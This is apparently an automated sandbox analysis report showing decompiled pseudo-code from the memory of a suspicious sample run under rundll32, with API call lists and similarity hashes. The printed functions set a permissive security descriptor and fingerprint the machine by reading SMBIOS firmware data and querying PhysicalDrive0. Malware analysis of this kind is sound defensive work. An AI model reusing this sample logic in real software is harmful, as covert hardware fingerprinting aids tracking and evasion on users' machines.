                                                            0x0463af1b
                                                            0x0463af1b
                                                            0x0463af23
                                                            0x0463af5d
                                                            0x0463af25
                                                            0x0463af27
                                                            0x0463af32
                                                            0x0463af32
                                                            0x0463af49
                                                            0x0463af49

                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(0463B60D,00000001,74D0F560,74CB6490), ref: 0463AE8F
                                                            • AllocateAndInitializeSid.ADVAPI32(0463B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463AEAB
                                                            • GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0463AEB9
                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0463AEC5
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0463AECC
                                                            • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0463AEDC
                                                            • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0463AEF1
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0463AF02
                                                            • FreeSid.ADVAPI32(00000000), ref: 0463AF1B
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463AF2B
                                                            • HeapFree.KERNEL32(00000000), ref: 0463AF32
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Initialize$AllocateDescriptorFreeProcessSecurity$AccessAllowedDaclLength
                                                            • String ID:
                                                            • API String ID: 629205620-0
                                                            • Opcode ID: d714ce62c3711784a479d714f8fd8d1251796b258d182c0ef0ed896600ac20e4
                                                            • Instruction ID: e89430e9bef18c0b6875781aaf1fb8bffedce480a3119a16db030ae60511328e
                                                            • Opcode Fuzzy Hash: d714ce62c3711784a479d714f8fd8d1251796b258d182c0ef0ed896600ac20e4
                                                            • Instruction Fuzzy Hash: F0314CB1A00218ABDB24DFA59C4DFBFBBBCEF54741F005029B905E2281EF759D009BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E046445C0(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				short _v16;
                                                            				char _v536;
                                                            				WCHAR* _v540;
                                                            				WCHAR* _v544;
                                                            				signed int _t35;
                                                            				char* _t41;
                                                            				WCHAR* _t46;
                                                            				short _t49;
                                                            				short _t50;
                                                            				WCHAR* _t51;
                                                            				long _t53;
                                                            				signed int _t56;
                                                            				signed int _t63;
                                                            				long _t64;
                                                            				WCHAR* _t68;
                                                            				long _t70;
                                                            				WCHAR* _t74;
                                                            				signed int _t76;
                                                            				void* _t98;
                                                            				WCHAR* _t101;
                                                            				void* _t104;
                                                            				long _t105;
                                                            				WCHAR* _t106;
                                                            				signed int _t107;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				void* _t110;
                                                            				void* _t111;
                                                            				long _t115;
                                                            
                                                            				_t98 = __edi;
                                                            				_t35 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t35 ^ _t107;
                                                            				_t104 = __ecx;
                                                            				_v540 = __edx;
                                                            				E0465DEA0(__edi, __edx, 0, 0x208);
                                                            				E0465DEA0(_t98,  &_v536, 0, 0x208);
                                                            				_t109 = _t108 + 0x18;
                                                            				_t41 =  &_v536;
                                                            				__imp__GetProcessImageFileNameW(_t104, _t41, 0x104);
                                                            				if(_t41 == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t107;
                                                            					return E04655AFE(_v8 ^ _t107);
                                                            				} else {
                                                            					_push(_t98);
                                                            					_t105 = GetLogicalDriveStringsW(0, 0);
                                                            					_t115 = _t105;
                                                            					if(_t115 == 0) {
                                                            						L15:
                                                            						goto L16;
                                                            					} else {
                                                            						_t5 = _t105 + 1; // 0x1
                                                            						_push(__ebx);
                                                            						_push( ~(_t115 > 0) | _t5 * 0x00000002);
                                                            						_t46 = L04655B55( ~(_t115 > 0) | _t5 * 0x00000002, _t105, _t115);
                                                            						_t86 = 2 + _t105 * 2;
                                                            						_t74 = _t46;
                                                            						_v544 = _t74;
                                                            						E0465DEA0(GetLogicalDriveStringsW, _t74, 0, 2 + _t105 * 2);
                                                            						_t110 = _t109 + 0x10;
                                                            						if(GetLogicalDriveStringsW(_t105, _t74) != 0) {
                                                            							_t49 =  *0x467edb0; // 0x3a0020
                                                            							_v16 = _t49;
                                                            							_t50 =  *0x467edb4; // 0x0
                                                            							_push(0x208);
                                                            							_v12 = _t50;
                                                            							_t51 = L04655B55(_t86, _t105, __eflags);
                                                            							_t111 = _t110 + 4;
                                                            							_t101 = _t51;
                                                            							_t106 = _t74;
                                                            							while(1) {
                                                            								_t87 =  *_t106;
                                                            								_v16 =  *_t106;
                                                            								_t53 = QueryDosDeviceW( &_v16, _t101, 0x104);
                                                            								__eflags = _t53;
                                                            								if(_t53 != 0) {
                                                            									goto L8;
                                                            								}
                                                            								_t64 = GetLastError();
                                                            								__eflags = _t64 - 0x7a;
                                                            								if(_t64 == 0x7a) {
                                                            									L04655B0F(_t101);
                                                            									_t87 =  ~(__eflags > 0) | 2;
                                                            									_push( ~(__eflags > 0) | 2);
                                                            									_t68 = L04655B55( ~(__eflags > 0) | 2, _t106, __eflags);
                                                            									_t111 = _t111 + 8;
                                                            									_t101 = _t68;
                                                            									_t70 = QueryDosDeviceW( &_v16, _t101, 1);
                                                            									__eflags = _t70;
                                                            									if(_t70 != 0) {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								L14:
                                                            								L04655B0F(_v544);
                                                            								L04655B0F(_t101);
                                                            								goto L15;
                                                            								L8:
                                                            								_t76 = lstrlenW(_t101);
                                                            								_t56 = E0465F58A(_t76, _t87, _t106,  &_v536, _t101, _t76);
                                                            								_t111 = _t111 + 0xc;
                                                            								__eflags = _t56;
                                                            								if(_t56 == 0) {
                                                            									wsprintfW(_v540, L"%s%s",  &_v16,  &_v536 + _t76 * 2);
                                                            									_t111 = _t111 + 0x10;
                                                            								} else {
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_t63 =  *_t106 & 0x0000ffff;
                                                            										_t106 =  &(_t106[1]);
                                                            										__eflags = _t63;
                                                            									} while (_t63 != 0);
                                                            									__eflags =  *_t106 - _t63;
                                                            									if( *_t106 != _t63) {
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L14;
                                                            							}
                                                            						} else {
                                                            							L04655B0F(_t74);
                                                            							return E04655AFE(_v8 ^ _t107);
                                                            						}
                                                            					}
                                                            				}
                                                            			}


































                                                            0x046445c0
                                                            0x046445c9
                                                            0x046445d0
                                                            0x046445db
                                                            0x046445e0
                                                            0x046445e6
                                                            0x046445f9
                                                            0x046445fe
                                                            0x04644601
                                                            0x0464460e
                                                            0x04644616
                                                            0x0464477d
                                                            0x04644780
                                                            0x0464478b
                                                            0x0464461c
                                                            0x0464461c
                                                            0x04644629
                                                            0x0464462b
                                                            0x0464462d
                                                            0x0464477c
                                                            0x00000000
                                                            0x04644633
                                                            0x04644635
                                                            0x0464463f
                                                            0x04644647
                                                            0x04644648
                                                            0x0464464d
                                                            0x04644654
                                                            0x0464465a
                                                            0x04644660
                                                            0x04644665
                                                            0x0464466e
                                                            0x0464468a
                                                            0x0464468f
                                                            0x04644692
                                                            0x04644698
                                                            0x0464469d
                                                            0x046446a1
                                                            0x046446a6
                                                            0x046446a9
                                                            0x046446ab
                                                            0x046446ad
                                                            0x046446ad
                                                            0x046446c0
                                                            0x046446c4
                                                            0x046446c6
                                                            0x046446c8
                                                            0x00000000
                                                            0x00000000
                                                            0x046446ca
                                                            0x046446d0
                                                            0x046446d3
                                                            0x046446da
                                                            0x046446f2
                                                            0x046446f4
                                                            0x046446f5
                                                            0x046446fa
                                                            0x046446fd
                                                            0x04644706
                                                            0x04644708
                                                            0x0464470a
                                                            0x00000000
                                                            0x00000000
                                                            0x0464470a
                                                            0x04644767
                                                            0x0464476d
                                                            0x04644773
                                                            0x00000000
                                                            0x0464470c
                                                            0x04644713
                                                            0x0464471e
                                                            0x04644723
                                                            0x04644726
                                                            0x04644728
                                                            0x0464475e
                                                            0x04644764
                                                            0x0464472a
                                                            0x0464472a
                                                            0x04644730
                                                            0x04644730
                                                            0x04644733
                                                            0x04644736
                                                            0x04644736
                                                            0x0464473b
                                                            0x0464473e
                                                            0x00000000
                                                            0x04644740
                                                            0x0464473e
                                                            0x00000000
                                                            0x04644728
                                                            0x04644670
                                                            0x04644671
                                                            0x04644689
                                                            0x04644689
                                                            0x0464466e
                                                            0x0464462d

                                                            APIs
                                                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,?,?,?,?,74CB69A0), ref: 0464460E
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,74CB69A0), ref: 04644627
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0464466A
                                                            • QueryDosDeviceW.KERNEL32(?,00000000,00000104,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 046446C4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 046446CA
                                                            • QueryDosDeviceW.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 04644706
                                                            • lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0464470D
                                                            • wsprintfW.USER32 ref: 0464475E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlenwsprintf
                                                            • String ID: %s%s
                                                            • API String ID: 1509662898-3252725368
                                                            • Opcode ID: afd7742874d045528df7ccfa251ca8762949a59e19d02009054aea029f92b2c2
                                                            • Instruction ID: 1a4ec6ef8a48a96bf64a8fdb45d7e2c760d5ac7b6ec258b92e12486cf5a9b221
                                                            • Opcode Fuzzy Hash: afd7742874d045528df7ccfa251ca8762949a59e19d02009054aea029f92b2c2
                                                            • Instruction Fuzzy Hash: 1F41E971E40208ABEB14AB64DC89FAE73BCDF55304F00006AE90AE7290FE75AE018B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E04646780(void* __ecx, void* __edi, char* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				struct _OVERLAPPED* _v32;
                                                            				struct _OVERLAPPED* _v36;
                                                            				void _v40;
                                                            				char _v44;
                                                            				struct _OVERLAPPED* _v48;
                                                            				void* _v52;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				intOrPtr _v64;
                                                            				signed int _t119;
                                                            				_Unknown_base(*)()* _t123;
                                                            				intOrPtr _t125;
                                                            				void* _t126;
                                                            				char _t137;
                                                            				char _t138;
                                                            				intOrPtr _t140;
                                                            				char _t143;
                                                            				intOrPtr _t144;
                                                            				char _t147;
                                                            				intOrPtr _t148;
                                                            				void* _t152;
                                                            				char _t153;
                                                            				intOrPtr _t154;
                                                            				intOrPtr _t155;
                                                            				intOrPtr _t159;
                                                            				intOrPtr _t163;
                                                            				intOrPtr _t167;
                                                            				intOrPtr _t171;
                                                            				void* _t173;
                                                            				intOrPtr _t177;
                                                            				void* _t178;
                                                            				intOrPtr* _t190;
                                                            				intOrPtr* _t192;
                                                            				intOrPtr* _t194;
                                                            				intOrPtr* _t197;
                                                            				intOrPtr* _t199;
                                                            				intOrPtr* _t202;
                                                            				intOrPtr* _t204;
                                                            				intOrPtr* _t206;
                                                            				void* _t207;
                                                            				intOrPtr _t208;
                                                            				intOrPtr _t209;
                                                            				intOrPtr _t210;
                                                            				intOrPtr* _t211;
                                                            				intOrPtr* _t212;
                                                            				intOrPtr* _t214;
                                                            				intOrPtr* _t216;
                                                            				intOrPtr* _t218;
                                                            				void* _t225;
                                                            				long _t226;
                                                            				long _t227;
                                                            				void* _t228;
                                                            				char* _t229;
                                                            				char* _t230;
                                                            				char* _t231;
                                                            				void* _t232;
                                                            				char* _t233;
                                                            				void* _t234;
                                                            				void* _t235;
                                                            				void* _t236;
                                                            				intOrPtr _t237;
                                                            				intOrPtr _t238;
                                                            				intOrPtr* _t245;
                                                            				long _t246;
                                                            				void* _t248;
                                                            				struct _OVERLAPPED* _t251;
                                                            				intOrPtr* _t253;
                                                            				void* _t258;
                                                            				signed int _t261;
                                                            				void* _t262;
                                                            				void* _t263;
                                                            				void* _t264;
                                                            				intOrPtr _t298;
                                                            
                                                            				_t250 = __esi;
                                                            				_t186 = __ecx;
                                                            				_t261 = (_t258 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t258 + 4));
                                                            				_t256 = _t261;
                                                            				_t262 = _t261 - 0x58;
                                                            				_t119 =  *0x4684008; // 0xd355be4e
                                                            				_v16 = _t119 ^ _t261;
                                                            				_push(__esi);
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v48 = 0;
                                                            				asm("movaps [ebp-0x50], xmm0");
                                                            				_t245 = 0;
                                                            				asm("movaps [ebp-0x20], xmm0");
                                                            				_v64 = 0;
                                                            				_t123 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemFirmwareTable");
                                                            				_v56 = _t123;
                                                            				if(_t123 != 0) {
                                                            					_t250 =  *_t123(0x52534d42, 0, 0, 0);
                                                            					_t269 = _t250;
                                                            					if(_t250 != 0) {
                                                            						_push(_t250);
                                                            						_t177 = L04655B55(_t186, _t250, _t269);
                                                            						_t262 = _t262 + 4;
                                                            						_v64 = _t177;
                                                            						if(_t177 != 0) {
                                                            							_t178 = _v56(0x52534d42, 0, _t177, _t250);
                                                            							_t237 = _v64;
                                                            							_t250 = _t237 + 8;
                                                            							_t238 =  *((intOrPtr*)(_t237 + 4));
                                                            							if(_t238 == _t178 + 0xfffffff8) {
                                                            								_t186 = 0;
                                                            								if(_t238 != 0) {
                                                            									while( *_t250 != 1) {
                                                            										_t253 = _t250 + ( *(_t250 + 1) & 0x000000ff);
                                                            										while( *_t253 != _t245) {
                                                            											_t253 = _t253 + 1;
                                                            										}
                                                            										_t186 = _t186 + 1;
                                                            										_t250 = _t253 + 2;
                                                            										_t276 = _t186 - _t238;
                                                            										if(_t186 < _t238) {
                                                            											continue;
                                                            										} else {
                                                            										}
                                                            										goto L11;
                                                            									}
                                                            									_t245 = E04646710(_t250,  *((intOrPtr*)(_t250 + 4)));
                                                            									_t186 = _t250 + 8;
                                                            									E04646680(_t250 + 8, ( *(_v64 + 1) & 0x000000ff) * 0x100 + ( *(_v64 + 2) & 0x000000ff),  &_v44);
                                                            									asm("movaps xmm0, [ebp-0x20]");
                                                            									_t262 = _t262 + 4;
                                                            									asm("movaps [ebp-0x50], xmm0");
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L11:
                                                            				_push(0x2000);
                                                            				_t225 = L04655B55(_t186, _t250, _t276);
                                                            				_t263 = _t262 + 4;
                                                            				_t251 = 0;
                                                            				_v60 = _t225;
                                                            				if(_t225 != 0) {
                                                            					E0465DEA0(_t245, _t225, 0, 0x2000);
                                                            					_t263 = _t263 + 0xc;
                                                            					_v56 = 0;
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v32 = 0;
                                                            					asm("movq [ebp-0x1c], xmm0");
                                                            					_v40 = 0;
                                                            					_v36 = 0;
                                                            					_t173 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 3, 0, 3, 0, 0);
                                                            					_v52 = _t173;
                                                            					if(_t173 != 0xffffffff) {
                                                            						_t186 =  &_v40;
                                                            						DeviceIoControl(_t173, 0x2d1400,  &_v40, 0xc, _v60, 0x2000,  &_v56, 0);
                                                            						_t251 =  !=  ? _v60 : 0;
                                                            						CloseHandle(_v52);
                                                            					}
                                                            					_t225 = _v60;
                                                            				}
                                                            				if(_t245 == 0) {
                                                            					_t125 = 0;
                                                            					__eflags = 0;
                                                            				} else {
                                                            					_t218 = _t245;
                                                            					_t31 = _t218 + 1; // 0x1
                                                            					_v52 = _t31;
                                                            					do {
                                                            						_t171 =  *_t218;
                                                            						_t218 = _t218 + 1;
                                                            					} while (_t171 != 0);
                                                            					_t186 = _t218 - _v52;
                                                            					_t125 = _t218 - _v52 + 1;
                                                            					_v48 = _t125;
                                                            				}
                                                            				if(_t251 != 0) {
                                                            					_t208 = _t251->OffsetHigh;
                                                            					if(_t208 != 0) {
                                                            						_t216 = _t208 + _t225;
                                                            						_v52 = _t216 + 1;
                                                            						do {
                                                            							_t167 =  *_t216;
                                                            							_t216 = _t216 + 1;
                                                            						} while (_t167 != 0);
                                                            						_t125 = _v48 + 1 + _t216 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t209 = _t251->hEvent;
                                                            					if(_t209 != 0) {
                                                            						_t214 = _t209 + _t225;
                                                            						_v52 = _t214 + 1;
                                                            						do {
                                                            							_t163 =  *_t214;
                                                            							_t214 = _t214 + 1;
                                                            						} while (_t163 != 0);
                                                            						_t125 = _v48 + 1 + _t214 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t210 =  *((intOrPtr*)(_t251 + 0x14));
                                                            					if(_t210 != 0) {
                                                            						_t212 = _t210 + _t225;
                                                            						_v52 = _t212 + 1;
                                                            						do {
                                                            							_t159 =  *_t212;
                                                            							_t212 = _t212 + 1;
                                                            						} while (_t159 != 0);
                                                            						_t125 = _v48 + 1 + _t212 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t186 =  *((intOrPtr*)(_t251 + 0x18));
                                                            					if(_t186 != 0) {
                                                            						_t211 = _t186 + _t225;
                                                            						_t236 = _t211 + 1;
                                                            						do {
                                                            							_t155 =  *_t211;
                                                            							_t211 = _t211 + 1;
                                                            						} while (_t155 != 0);
                                                            						_t186 = _t211 - _t236;
                                                            						_t125 = _v48 + 1 + _t211 - _t236;
                                                            						_t298 = _t125;
                                                            						_v48 = _t125;
                                                            					}
                                                            				}
                                                            				_t126 = _t125 + 0x28;
                                                            				_push(_t126);
                                                            				_v52 = _t126;
                                                            				_t226 = L04655B55(_t186, _t251, _t298);
                                                            				_t264 = _t263 + 4;
                                                            				_v56 = _t226;
                                                            				if(_t226 == 0) {
                                                            					L68:
                                                            					_t246 = _v56;
                                                            				} else {
                                                            					E0465DEA0(_t245, _t226, 0, _v52);
                                                            					_t227 = _v56;
                                                            					_t264 = _t264 + 0xc;
                                                            					asm("movaps xmm0, [ebp-0x50]");
                                                            					 *_t227 = _v48;
                                                            					_t136 = 0x28;
                                                            					_v48 = 0x28;
                                                            					asm("movups [edx+0x4], xmm0");
                                                            					if(_t245 != 0) {
                                                            						 *((intOrPtr*)(_t227 + 0x14)) = 0x28;
                                                            						_t206 = _t245;
                                                            						_t152 = _t227 + 0x28 - _t245;
                                                            						_v52 = _t152;
                                                            						_t235 = _t152;
                                                            						asm("o16 nop [eax+eax]");
                                                            						do {
                                                            							_t153 =  *_t206;
                                                            							_t206 = _t206 + 1;
                                                            							 *((char*)(_t235 + _t206 - 1)) = _t153;
                                                            						} while (_t153 != 0);
                                                            						_t227 = _v56;
                                                            						_t71 = _t245 + 1; // 0x1
                                                            						_t207 = _t71;
                                                            						do {
                                                            							_t154 =  *_t245;
                                                            							_t245 = _t245 + 1;
                                                            						} while (_t154 != 0);
                                                            						_t72 = _t245 - _t207 + 0x29; // 0x2a
                                                            						_t136 = _t72;
                                                            						_v48 = _t136;
                                                            					}
                                                            					if(_t251 == 0) {
                                                            						goto L68;
                                                            					} else {
                                                            						_t248 = _v60;
                                                            						if(_t251->OffsetHigh != 0) {
                                                            							 *((intOrPtr*)(_t227 + 0x18)) = _t136;
                                                            							_t202 = _t251->OffsetHigh + _t248;
                                                            							_t233 = _t227 + _t136;
                                                            							do {
                                                            								_t147 =  *_t202;
                                                            								_t202 = _t202 + 1;
                                                            								 *_t233 = _t147;
                                                            								_t233 = _t233 + 1;
                                                            							} while (_t147 != 0);
                                                            							_t204 = _t251->OffsetHigh + _t248;
                                                            							_t234 = _t204 + 1;
                                                            							do {
                                                            								_t148 =  *_t204;
                                                            								_t204 = _t204 + 1;
                                                            							} while (_t148 != 0);
                                                            							_t227 = _v56;
                                                            							_t136 = _v48 + 1 + _t204 - _t234;
                                                            							_v48 = _t136;
                                                            						}
                                                            						if(_t251->hEvent != 0) {
                                                            							 *((intOrPtr*)(_t227 + 0x1c)) = _t136;
                                                            							_t197 = _t251->hEvent + _t248;
                                                            							_t231 = _t227 + _t136;
                                                            							do {
                                                            								_t143 =  *_t197;
                                                            								_t197 = _t197 + 1;
                                                            								 *_t231 = _t143;
                                                            								_t231 = _t231 + 1;
                                                            							} while (_t143 != 0);
                                                            							_t199 = _t251->hEvent + _t248;
                                                            							_t232 = _t199 + 1;
                                                            							do {
                                                            								_t144 =  *_t199;
                                                            								_t199 = _t199 + 1;
                                                            							} while (_t144 != 0);
                                                            							_t136 = _v48 + 1 + _t199 - _t232;
                                                            							_v48 = _t136;
                                                            						}
                                                            						_t246 = _v56;
                                                            						if( *((intOrPtr*)(_t251 + 0x14)) == 0) {
                                                            							_t228 = _v60;
                                                            						} else {
                                                            							 *((intOrPtr*)(_t246 + 0x20)) = _t136;
                                                            							_t230 = _t136 + _t246;
                                                            							_t192 =  *((intOrPtr*)(_t251 + 0x14)) + _v60;
                                                            							do {
                                                            								_t138 =  *_t192;
                                                            								_t192 = _t192 + 1;
                                                            								 *_t230 = _t138;
                                                            								_t230 = _t230 + 1;
                                                            							} while (_t138 != 0);
                                                            							_t228 = _v60;
                                                            							_t194 =  *((intOrPtr*)(_t251 + 0x14)) + _t228;
                                                            							_v52 = _t194 + 1;
                                                            							do {
                                                            								_t140 =  *_t194;
                                                            								_t194 = _t194 + 1;
                                                            							} while (_t140 != 0);
                                                            							_t136 = _v48 + 1 + _t194 - _v52;
                                                            						}
                                                            						if( *((intOrPtr*)(_t251 + 0x18)) != 0) {
                                                            							 *((intOrPtr*)(_t246 + 0x24)) = _t136;
                                                            							_t190 =  *((intOrPtr*)(_t251 + 0x18)) + _t228;
                                                            							_t229 = _t136 + _t246;
                                                            							do {
                                                            								_t137 =  *_t190;
                                                            								_t190 = _t190 + 1;
                                                            								 *_t229 = _t137;
                                                            								_t229 = _t229 + 1;
                                                            							} while (_t137 != 0);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t128 = _v60;
                                                            				if(_v60 != 0) {
                                                            					L04655B0F(_t128);
                                                            					_t264 = _t264 + 4;
                                                            				}
                                                            				_t129 = _v64;
                                                            				if(_v64 != 0) {
                                                            					L04655B0F(_t129);
                                                            				}
                                                            				return E04655AFE(_v16 ^ _t256);
                                                            			}














































































                                                            0x04646780
                                                            0x04646780
                                                            0x04646789
                                                            0x04646790
                                                            0x04646794
                                                            0x04646796
                                                            0x04646799
                                                            0x046467a0
                                                            0x046467a3
                                                            0x046467a5
                                                            0x046467b1
                                                            0x046467b9
                                                            0x046467bd
                                                            0x046467bf
                                                            0x046467c3
                                                            0x046467cd
                                                            0x046467d3
                                                            0x046467d8
                                                            0x046467e8
                                                            0x046467ea
                                                            0x046467ec
                                                            0x046467f2
                                                            0x046467f3
                                                            0x046467f8
                                                            0x046467fb
                                                            0x04646800
                                                            0x0464680e
                                                            0x04646811
                                                            0x04646817
                                                            0x0464681a
                                                            0x0464681f
                                                            0x04646821
                                                            0x04646825
                                                            0x04646827
                                                            0x04646830
                                                            0x04646835
                                                            0x04646837
                                                            0x04646838
                                                            0x0464683d
                                                            0x0464683e
                                                            0x04646841
                                                            0x04646843
                                                            0x00000000
                                                            0x00000000
                                                            0x04646845
                                                            0x00000000
                                                            0x04646843
                                                            0x04646851
                                                            0x04646873
                                                            0x04646876
                                                            0x0464687b
                                                            0x0464687f
                                                            0x04646882
                                                            0x04646882
                                                            0x04646825
                                                            0x0464681f
                                                            0x04646800
                                                            0x046467ec
                                                            0x04646886
                                                            0x04646886
                                                            0x04646890
                                                            0x04646892
                                                            0x04646895
                                                            0x04646897
                                                            0x0464689c
                                                            0x046468a5
                                                            0x046468aa
                                                            0x046468ad
                                                            0x046468b0
                                                            0x046468b3
                                                            0x046468b6
                                                            0x046468bb
                                                            0x046468cf
                                                            0x046468d2
                                                            0x046468d8
                                                            0x046468de
                                                            0x046468ed
                                                            0x046468f9
                                                            0x04646904
                                                            0x04646908
                                                            0x04646908
                                                            0x0464690e
                                                            0x0464690e
                                                            0x04646913
                                                            0x04646932
                                                            0x04646932
                                                            0x04646915
                                                            0x04646915
                                                            0x04646917
                                                            0x0464691a
                                                            0x04646920
                                                            0x04646920
                                                            0x04646922
                                                            0x04646923
                                                            0x04646927
                                                            0x0464692a
                                                            0x0464692d
                                                            0x0464692d
                                                            0x04646936
                                                            0x0464693c
                                                            0x04646941
                                                            0x04646943
                                                            0x04646948
                                                            0x04646950
                                                            0x04646950
                                                            0x04646952
                                                            0x04646953
                                                            0x0464695e
                                                            0x04646960
                                                            0x04646960
                                                            0x04646963
                                                            0x04646968
                                                            0x0464696a
                                                            0x0464696f
                                                            0x04646972
                                                            0x04646972
                                                            0x04646974
                                                            0x04646975
                                                            0x04646980
                                                            0x04646982
                                                            0x04646982
                                                            0x04646985
                                                            0x0464698a
                                                            0x0464698c
                                                            0x04646991
                                                            0x04646994
                                                            0x04646994
                                                            0x04646996
                                                            0x04646997
                                                            0x046469a2
                                                            0x046469a4
                                                            0x046469a4
                                                            0x046469a7
                                                            0x046469ac
                                                            0x046469ae
                                                            0x046469b0
                                                            0x046469b3
                                                            0x046469b3
                                                            0x046469b5
                                                            0x046469b6
                                                            0x046469bd
                                                            0x046469c0
                                                            0x046469c0
                                                            0x046469c2
                                                            0x046469c2
                                                            0x046469ac
                                                            0x046469c5
                                                            0x046469c8
                                                            0x046469c9
                                                            0x046469d1
                                                            0x046469d3
                                                            0x046469d6
                                                            0x046469db
                                                            0x04646b36
                                                            0x04646b36
                                                            0x046469e1
                                                            0x046469e7
                                                            0x046469ec
                                                            0x046469ef
                                                            0x046469f5
                                                            0x046469f9
                                                            0x046469fb
                                                            0x04646a00
                                                            0x04646a03
                                                            0x04646a09
                                                            0x04646a0b
                                                            0x04646a0e
                                                            0x04646a13
                                                            0x04646a15
                                                            0x04646a18
                                                            0x04646a1a
                                                            0x04646a20
                                                            0x04646a20
                                                            0x04646a22
                                                            0x04646a25
                                                            0x04646a29
                                                            0x04646a2d
                                                            0x04646a30
                                                            0x04646a30
                                                            0x04646a33
                                                            0x04646a33
                                                            0x04646a35
                                                            0x04646a36
                                                            0x04646a3c
                                                            0x04646a3c
                                                            0x04646a3f
                                                            0x04646a3f
                                                            0x04646a44
                                                            0x00000000
                                                            0x04646a4a
                                                            0x04646a4e
                                                            0x04646a51
                                                            0x04646a53
                                                            0x04646a59
                                                            0x04646a5b
                                                            0x04646a60
                                                            0x04646a60
                                                            0x04646a62
                                                            0x04646a65
                                                            0x04646a67
                                                            0x04646a6a
                                                            0x04646a71
                                                            0x04646a73
                                                            0x04646a76
                                                            0x04646a76
                                                            0x04646a78
                                                            0x04646a79
                                                            0x04646a82
                                                            0x04646a86
                                                            0x04646a88
                                                            0x04646a88
                                                            0x04646a8f
                                                            0x04646a91
                                                            0x04646a97
                                                            0x04646a99
                                                            0x04646aa0
                                                            0x04646aa0
                                                            0x04646aa2
                                                            0x04646aa5
                                                            0x04646aa7
                                                            0x04646aaa
                                                            0x04646ab1
                                                            0x04646ab3
                                                            0x04646ab6
                                                            0x04646ab6
                                                            0x04646ab8
                                                            0x04646ab9
                                                            0x04646ac3
                                                            0x04646ac5
                                                            0x04646ac5
                                                            0x04646acc
                                                            0x04646acf
                                                            0x04646b12
                                                            0x04646ad1
                                                            0x04646ad1
                                                            0x04646ad4
                                                            0x04646ada
                                                            0x04646ae0
                                                            0x04646ae0
                                                            0x04646ae2
                                                            0x04646ae5
                                                            0x04646ae7
                                                            0x04646aea
                                                            0x04646af1
                                                            0x04646af4
                                                            0x04646af9
                                                            0x04646b00
                                                            0x04646b00
                                                            0x04646b02
                                                            0x04646b03
                                                            0x04646b0e
                                                            0x04646b0e
                                                            0x04646b19
                                                            0x04646b1b
                                                            0x04646b21
                                                            0x04646b23
                                                            0x04646b26
                                                            0x04646b26
                                                            0x04646b28
                                                            0x04646b2b
                                                            0x04646b2d
                                                            0x04646b30
                                                            0x04646b34
                                                            0x04646b19
                                                            0x04646a44
                                                            0x04646b39
                                                            0x04646b3e
                                                            0x04646b41
                                                            0x04646b46
                                                            0x04646b46
                                                            0x04646b49
                                                            0x04646b4e
                                                            0x04646b51
                                                            0x04646b56
                                                            0x04646b6d

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemFirmwareTable,?,00000000), ref: 046467C6
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046467CD
                                                            • CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000003,00000000,00000003,00000000,00000000), ref: 046468D2
